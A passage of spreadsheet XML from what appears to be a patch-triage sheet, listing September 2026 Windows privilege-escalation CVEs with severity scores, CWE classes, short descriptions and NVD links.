      <c r="T555" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69687</t>
        </is>
      </c>
    </row>
    <row r="556">
      <c r="A556" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B556" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C556" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69691</t>
        </is>
      </c>
      <c r="D556" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E556" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F556" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G556" s="5" t="inlineStr"/>
      <c r="H556" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I556" s="5" t="inlineStr"/>
      <c r="J556" s="5" t="inlineStr"/>
      <c r="K556" s="5" t="inlineStr"/>
      <c r="L556" s="5" t="inlineStr"/>
      <c r="M556" s="5" t="inlineStr"/>
      <c r="N556" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O556" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P556" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q556" s="5" t="inlineStr"/>
      <c r="R556" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S556" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Spaceport.sys allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T556" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69691</t>
        </is>
      </c>
    </row>
    <row r="557">
      <c r="A557" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B557" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C557" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69707</t>
        </is>
      </c>
      <c r="D557" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E557" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F557" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G557" s="5" t="inlineStr"/>
      <c r="H557" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I557" s="5" t="inlineStr"/>
      <c r="J557" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K5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57" s="5" t="inlineStr"/>
      <c r="M557" s="5" t="inlineStr"/>
      <c r="N557" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O557" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P557" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q557" s="5" t="inlineStr"/>
      <c r="R557" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S557" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T557" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69707</t>
        </is>
      </c>
    </row>
    <row r="558">
      <c r="A558" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B558" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C558" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69709</t>
        </is>
      </c>
      <c r="D558" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E558" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F558" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G558" s="5" t="inlineStr"/>
      <c r="H558" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I558" s="5" t="inlineStr"/>
      <c r="J558" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K5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58" s="5" t="inlineStr"/>
      <c r="M558" s="5" t="inlineStr"/>
      <c r="N558" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O558" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P558" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q558" s="5" t="inlineStr"/>
      <c r="R558" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S558" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="T558" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69709</t>
        </is>
      </c>
    </row>
    <row r="559">
      <c r="A559" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B559" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C559" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69720</t>
        </is>
      </c>
      <c r="D559" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E559" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F559" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G559" s="5" t="inlineStr"/>
      <c r="H559" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I559" s="5" t="inlineStr"/>
      <c r="J559" s="5" t="inlineStr"/>
      <c r="K559" s="5" t="inlineStr"/>
      <c r="L559" s="5" t="inlineStr"/>
      <c r="M559" s="5" t="inlineStr"/>
      <c r="N559" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O559" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P559" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q559" s="5" t="inlineStr"/>
      <c r="R559" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S559" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows MIDI Service Module allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T559" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69720</t>
        </is>
      </c>
    </row>
    <row r="560">
      <c r="A560" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B560" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C560" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69725</t>
        </is>
      </c>
      <c r="D560" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E560" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F560" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G560" s="5" t="inlineStr"/>
      <c r="H560" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I560" s="5" t="inlineStr"/>
      <c r="J560" s="5" t="inlineStr"/>
      <c r="K560" s="5" t="inlineStr"/>
      <c r="L560" s="5" t="inlineStr"/>
      <c r="M560" s="5" t="inlineStr"/>
      <c r="N560" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O560" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P560" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q560" s="5" t="inlineStr"/>
      <c r="R560" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="S560" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Hello allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T560" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69725</t>
        </is>
      </c>
    </row>
    <row r="561">
      <c r="A561" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B561" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C561" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69731</t>
        </is>
      </c>
      <c r="D561" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E561" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F561" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G561" s="5" t="inlineStr"/>
      <c r="H561" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I561" s="5" t="inlineStr"/>
      <c r="J561" s="5" t="inlineStr"/>
      <c r="K561" s="5" t="inlineStr"/>
      <c r="L561" s="5" t="inlineStr"/>
      <c r="M561" s="5" t="inlineStr"/>
      <c r="N561" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O561" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P561" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q561" s="5" t="inlineStr"/>
      <c r="R561" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S561" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in HID class driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T561" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69731</t>
        </is>
      </c>
    </row>
    <row r="562">
      <c r="A562" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B562" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C562" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69738</t>
        </is>
      </c>
      <c r="D562" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E562" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F562" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G562" s="5" t="inlineStr"/>
      <c r="H562" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I562" s="5" t="inlineStr"/>
      <c r="J562" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K56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62" s="5" t="inlineStr"/>
      <c r="M562" s="5" t="inlineStr"/>
      <c r="N562" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O562" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P562" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q562" s="5" t="inlineStr"/>
      <c r="R562" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="S562" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T562" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69738</t>
        </is>
      </c>
    </row>
    <row r="563">
      <c r="A563" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B563" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C563" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69758</t>
        </is>
      </c>
      <c r="D563" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E563" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F563" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G563" s="5" t="inlineStr"/>
      <c r="H563" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I563" s="5" t="inlineStr"/>
      <c r="J563" s="5" t="inlineStr"/>
      <c r="K563" s="5" t="inlineStr"/>
      <c r="L563" s="5" t="inlineStr"/>
      <c r="M563" s="5" t="inlineStr"/>
      <c r="N563" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O563" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P563" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q563" s="5" t="inlineStr"/>
      <c r="R563" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S563" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Universal Disk Format File System Driver (UDFS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T563" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69758</t>
        </is>
      </c>
    </row>
    <row r="564">
      <c r="A564" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B564" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C564" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69785</t>
        </is>
      </c>
      <c r="D564" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E564" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F564" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G564" s="5" t="inlineStr"/>
      <c r="H564" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I564" s="5" t="inlineStr"/>
      <c r="J564" s="5" t="inlineStr"/>
      <c r="K564" s="5" t="inlineStr"/>
      <c r="L564" s="5" t="inlineStr"/>
      <c r="M564" s="5" t="inlineStr"/>
      <c r="N564" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O564" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P564" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q564" s="5" t="inlineStr"/>
      <c r="R564" s="5" t="inlineStr">
        <is>
          <t>CWE-426</t>
        </is>
      </c>
      <c r="S564" s="5" t="inlineStr">
        <is>
          <t>Untrusted search path in Windows Smart Card allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T564" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69785</t>
        </is>
      </c>
    </row>
    <row r="565">
      <c r="A565" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B565" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C565" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69787</t>
        </is>
      </c>
      <c r="D565" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E565" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F565" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G565" s="5" t="inlineStr"/>
      <c r="H565" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I565" s="5" t="inlineStr"/>
      <c r="J565" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K5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65" s="5" t="inlineStr"/>
      <c r="M565" s="5" t="inlineStr"/>
      <c r="N565" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O565" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P565" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q565" s="5" t="inlineStr"/>
      <c r="R565" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S565" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T565" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69787</t>
        </is>
      </c>
    </row>
    <row r="566">
      <c r="A566" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B566" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C566" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69790</t>
        </is>
      </c>
      <c r="D566" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E566" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F566" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G566" s="5" t="inlineStr"/>
      <c r="H566" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I566" s="5" t="inlineStr"/>
      <c r="J566" s="5" t="inlineStr"/>
      <c r="K566" s="5" t="inlineStr"/>
      <c r="L566" s="5" t="inlineStr"/>
      <c r="M566" s="5" t="inlineStr"/>
      <c r="N566" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O566" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P566" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q566" s="5" t="inlineStr"/>
      <c r="R566" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S566" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Credential Providers allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T566" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69790</t>
        </is>
      </c>
    </row>
    <row r="567">
      <c r="A567" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B567" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C567" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69799</t>
        </is>
      </c>
      <c r="D567" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E567" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F567" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G567" s="5" t="inlineStr"/>
      <c r="H567" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I567" s="5" t="inlineStr"/>
      <c r="J567" s="5" t="inlineStr"/>
      <c r="K567" s="5" t="inlineStr"/>
      <c r="L567" s="5" t="inlineStr"/>
      <c r="M567" s="5" t="inlineStr"/>
      <c r="N567" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O567" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P567" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q567" s="5" t="inlineStr"/>
      <c r="R567" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="S567" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Hello allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T567" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69799</t>
        </is>
      </c>
    </row>
    <row r="568">
      <c r="A568" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B568" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C568" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69801</t>
        </is>
      </c>
      <c r="D568" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E568" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F568" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G568" s="5" t="inlineStr"/>
      <c r="H568" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I568" s="5" t="inlineStr"/>
      <c r="J568" s="5" t="inlineStr"/>
      <c r="K568" s="5" t="inlineStr"/>
      <c r="L568" s="5" t="inlineStr"/>
      <c r="M568" s="5" t="inlineStr"/>
      <c r="N568" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O568" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P568" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q568" s="5" t="inlineStr"/>
      <c r="R568" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S568" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T568" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69801</t>
        </is>
      </c>
    </row>
    <row r="569">
      <c r="A569" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B569" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C569" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69821</t>
        </is>
      </c>
      <c r="D569" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E569" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F569" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G569" s="5" t="inlineStr"/>
      <c r="H569" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I569" s="5" t="inlineStr"/>
      <c r="J569" s="5" t="inlineStr"/>
      <c r="K569" s="5" t="inlineStr"/>
      <c r="L569" s="5" t="inlineStr"/>
      <c r="M569" s="5" t="inlineStr"/>
      <c r="N569" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O569" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P569" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q569" s="5" t="inlineStr"/>
      <c r="R569" s="5" t="inlineStr">
        <is>
          <t>CWE-116</t>
        </is>
      </c>
      <c r="S569" s="5" t="inlineStr">
        <is>
          <t>Improper encoding or escaping of output in Active Directory Certificate Services (AD CS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T569" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69821</t>
        </is>
      </c>
    </row>
    <row r="570">
      <c r="A570" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B570" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C570" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69822</t>
        </is>
      </c>
      <c r="D570" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E570" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F570" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G570" s="5" t="inlineStr"/>
      <c r="H570" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I570" s="5" t="inlineStr"/>
      <c r="J570" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K57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570" s="5" t="inlineStr"/>
      <c r="M570" s="5" t="inlineStr"/>
      <c r="N570" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O570" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P570" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q570" s="5" t="inlineStr"/>
      <c r="R570" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-197</t>
        </is>
      </c>
      <c r="S570" s="5" t="inlineStr">
        <is>
          <t>Numeric truncation error in Windows Kerberos allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T570" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69822</t>
        </is>
      </c>
    </row>
    <row r="571">
      <c r="A571" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B571" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C571" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69841</t>
        </is>
      </c>
      <c r="D571" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E571" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F571" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G571" s="5" t="inlineStr"/>
      <c r="H571" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I571" s="5" t="inlineStr"/>
      <c r="J571" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K5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1" s="5" t="inlineStr"/>
      <c r="M571" s="5" t="inlineStr"/>
      <c r="N571" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O571" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P571" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q571" s="5" t="inlineStr"/>
      <c r="R571" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S571" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Encrypting File System (EFS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T571" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69841</t>
        </is>
      </c>
    </row>
    <row r="572">
      <c r="A572" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B572" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C572" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69844</t>
        </is>
      </c>
      <c r="D572" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E572" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F572" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G572" s="5" t="inlineStr"/>
      <c r="H572" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I572" s="5" t="inlineStr"/>
      <c r="J572" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K5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2" s="5" t="inlineStr"/>
      <c r="M572" s="5" t="inlineStr"/>
      <c r="N572" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O572" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P572" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q572" s="5" t="inlineStr"/>
      <c r="R572" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S572" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T572" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69844</t>
        </is>
      </c>
    </row>
    <row r="573">
      <c r="A573" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B573" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C573" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69864</t>
        </is>
      </c>
      <c r="D573" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E573" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F573" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G573" s="5" t="inlineStr"/>
      <c r="H573" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I573" s="5" t="inlineStr"/>
      <c r="J573" s="5" t="inlineStr"/>
      <c r="K573" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t>
        </is>
      </c>
